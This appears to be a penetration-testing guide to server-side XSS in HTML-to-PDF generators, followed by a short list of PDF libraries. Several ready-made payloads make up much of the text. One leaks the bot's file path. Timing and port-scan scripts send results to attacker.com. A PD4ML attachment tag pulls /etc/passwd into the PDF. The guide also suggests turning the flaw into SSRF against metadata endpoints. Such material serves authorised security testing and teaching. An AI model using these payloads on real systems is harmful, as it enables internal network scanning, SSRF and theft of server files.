If a web page is creating a PDF using user controlled input, you can try to trick the bot that is creating the PDF into executing arbitrary JS code.
So, if the PDF creator bot finds some kind of HTMLtags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS.
Please, notice that the <script></script> tags don't work always, so you will need a different method to execute JS (for example, abusing <img ).
Also, note that in a regular exploitation you will be able to see/download the created pdf, so you will be able to see everything you write via JS (using document.write() for example). But, if you cannot see the created PDF, you will probably need extract the information making web request to you (Blind).
Popular PDF generation
wkhtmltopdf is known for its ability to convert HTML and CSS into PDF documents, utilizing the WebKit rendering engine. This tool is available as an open-source command line utility, making it accessible for a wide range of applications.
TCPDF offers a robust solution within the PHP ecosystem for PDF generation. It is capable of handling images, graphics, and encryption, showcasing its versatility for creating complex documents.
For those working in a Node.js environment, PDFKit presents a viable option. It enables the generation of PDF documents directly from HTML and CSS, providing a bridge between web content and printable formats.
Java developers might prefer iText, a library that not only facilitates PDF creation but also supports advanced features like digital signatures and form filling. Its comprehensive feature set makes it suitable for generating secure and interactive documents.
FPDF is another PHP library, distinguished by its simplicity and ease of use. It's designed for developers looking for a straightforward approach to PDF generation, without the need for extensive features.
Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>
Load an external script
The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">
Port Scan
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}
for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).
Attachments: PD4ML
There are some HTML 2 PDF engines that allow to specify attachments for the PDF, like PD4ML. You can abuse this feature to attach any local file to the PDF.
To open the attachment I opened the file with Firefox and double clicked the Paperclip symbol to store the attachment as a new file.
Capturing the PDF response with burp should also show the attachment in cleat text inside the PDF.
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html --><html><pd4ml:attachmentsrc="/etc/passwd"description="attachment sample"icon="Paperclip"/></html>
